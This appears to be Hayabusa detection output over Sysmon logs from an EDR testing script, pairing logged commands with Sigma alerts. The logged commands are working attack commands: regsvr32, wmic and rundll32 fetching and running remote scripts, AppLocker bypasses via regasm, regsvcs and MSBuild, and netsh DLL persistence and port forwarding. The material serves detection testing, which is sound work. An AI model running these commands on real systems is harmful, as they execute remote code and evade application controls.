+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C 
""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct 
scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe 
xxxFile.csproj,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.246 
+09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.286 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace show status : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace stop : Path: 
C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace show status : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace show status ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace stop : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace stop,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: 
C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh.exe add helper AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,Suspicious Netsh DLL 
Persistence,,rules/sigma/process_creation/win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat : Path: C:\Windows\System32\dispdiag.exe : User: MSEDGEWIN10\IEUser : Parent Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in 
CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 
"";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : 